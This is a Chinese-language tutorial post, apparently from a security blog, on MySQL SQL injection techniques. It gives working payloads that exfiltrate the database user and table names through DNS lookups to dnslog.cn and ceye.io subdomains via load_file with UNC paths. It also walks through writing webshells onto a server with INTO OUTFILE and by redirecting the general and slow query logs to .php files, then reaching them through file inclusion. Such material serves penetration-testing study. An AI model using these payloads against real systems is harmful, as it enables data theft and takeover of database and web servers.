首页 > 数据库 >【1.0版】【MYSQL安全】SQL注入:DNSlog外带盲注回显

【1.0版】【MYSQL安全】SQL注入:DNSlog外带盲注回显

时间:2024-08-11 21:17:49浏览次数:9  
标签:DNSlog 1.0 log 回显 UNC set file 日志 select

主题

SQL注入:DNSlog外带盲注回显

利用条件

DBMS中需要有可用的,能直接或间接引发DNS解析过程的子程序,即使用到UNC

Linux没有UNC路径,所以当处于Linux系统时,不能使用该方式获取数据

有个重要条件:load_file()函数可以使用。

也就是说需要配置文件my.ini中secure_file_priv=
UNC
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器.。UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。UNC路径就是类似\softer这样的形式的网络路径
格式: \servername\sharename ,其中 servername 是服务器名,sharename 是共享资源的名称。
目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename
payload:

select load_file(concat('\\',(select hex(user())),'.4efz3f.dnslog.cn/abc'));
http://127.0.0.3/Less-8/?id=1' and load_file(concat('\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.xxx.ceye.io\abc'))--+

图片

①select * into

mysql> select '' into outfile 'E:/1.txt';
Query OK, 1 row affected (0.00 sec)

mysql> select '' into outfile 'E:/1.txt';
Query OK, 1 row affected (0.00 sec)

use test;
drop table if exists vow;
create table vow(name text not null);
insert into vow(name) values('');
select name from vow into outfile 'E:/5.txt';
drop tables vow;

②基于log日志写shell法

查询当前mysql下log日志的默认地址,同时也看下log日志是否为开启状态,并且记录下原地址,方便后面恢复。

set global general_log = on;
开启日志监测,一般是关闭的,如果一直开,文件会很大的。

set global general_log_file = ‘G:/2.php’;
这里设置我们需要写入的路径就可以了。

select ‘’;
查询一个一句话,这个时候log日志里就会记录这个。

set global general_log_file = ‘D:\xampp\mysql\data\LAPTOP-SO1V6ABB.log’;
结束后,再修改为原来的路径。

set global general_log = off;
关闭下日志记录。

最后利用文件包含漏洞获取shell
③通过慢日志查询获得webshell

对日志量庞大,直接访问日志网页极有可能出现 500 错误。通过开启慢查询日志,记录了超时 10s 的 SQL,这样页面的代码量会减轻很多不易导致 500, 配置可解析日志文GETSHELL

show variables like '%slow%'; #查询慢日志配置

long_query_time 的默认值为 10,意思是运行 10S 以上的语句。该值可以指定为微秒的分辨率。具体指运行时间超过 long_query_time 值的 SQL,则会被记录到慢查询日志中。

set GLOBAL slow_query_log_file='D:/phpStudy2016/WWW/slow.php'; #配置慢日志的保存位置
set GLOBAL slow_query_log=on;
set GLOBAL log_queries_not_using_indexes=on;

select '' from mysql.db where sleep(10);

标签:DNSlog,1.0,log,回显,UNC,set,file,日志,select
From: https://www.cnblogs.com/o-O-oO/p/18353672

相关文章

  • 【1.0版】【MYSQL安全】sql注入系列:堆叠注入
    主题sql注入系列:堆叠注入原理mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行我们发现确实同时执行了,那么在实际中我们引号闭合之后也有可能可以进行堆叠注入,但是堆叠注入和开......
  • 【1.0版】【MYSQL安全】导入导出相关操作
    主题导入导出相关操作一、load_file()二、intooutfile一、load_file()load_file(file_name):读取文件并返回该文件的内容作为一个字符串使用条件:A、必须有权限读取并且文件必须完全可读and(selectcount()frommysql.user)>0#如果结果返回正常,说明具有读写......
  • 【1.0版】【MYSQL安全】sql注入系列:基于报错的 SQL 盲注
    主题sql注入:基于报错的SQL盲注一、Floor报错注入1.1floor函数1.2rand函数1.3count(*)1.4floor函数实际利用二、extractvalue函数三、updatexml函数:同extractvalue本来网页是不显示信息的,但是我们可以构造payload让信息通过错误提示回显出......
  • 《DNK210使用指南 -CanMV版 V1.0》第十八章 machine.Timer类实验
    第十八章machine.Timer类实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5......
  • 高精度计算器1.0
    今天闲来无事,写一个 高精度计算器,嘻嘻ヾ(≧▽≦*)o新手蒟蒻,望大家多关照呀,[]~( ̄▽ ̄)~*还想看什么,留言告诉我呀,o(* ̄▽ ̄*)ブ#include<bits/stdc++.h>//万能头文件#include<stdlib.h>//如果用system函数,需要用到此头文件#include<windows.h>//如果用SetConsoleTextAttribu......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • 《DNK210使用指南 -CanMV版 V1.0》第十七章 machine.WDT类实验
    第十七章machine.WDT类实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5)正......
  • http/1.0、http/1.1、http/2关于复用这块的理解
    一概述http/1.0 请求响应模式,请求发送到服务器,服务器响应结果后连接立马关闭。由于Http1.0底层使用的是TCP。 需要完整的经理TCP三次握手和四次挥手。下次发起请求时重复以上步骤。http/1.1 请求响应模式,可共享链接,但是需要一个请求-响应结束后才能发起另一个请求-响应。默......
  • 全面弄懂少儿编程与信息学奥赛-V1.0版
    全面弄懂少儿编程与信息学奥赛-V1.0版本次讲述话题都为作者自己学编程以及所在专业,行业,以及教学经验和实践来原创撰写,不保证100%正确,但是保证99%的相对正确,同样,我希望任何人去看待任何问题都理性思考,独立思考,自己去评判别人说的是否有道理,这个世界上任何事都没有绝对的对与错,但......
  • VulnhubAI-web 1.0靶机详解
    项目地址https://www.vulnhub.com/entry/ai-web-1,353/实验过程将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知DC-8的一个ip地址为192.168.47.135扫描Ai-Web......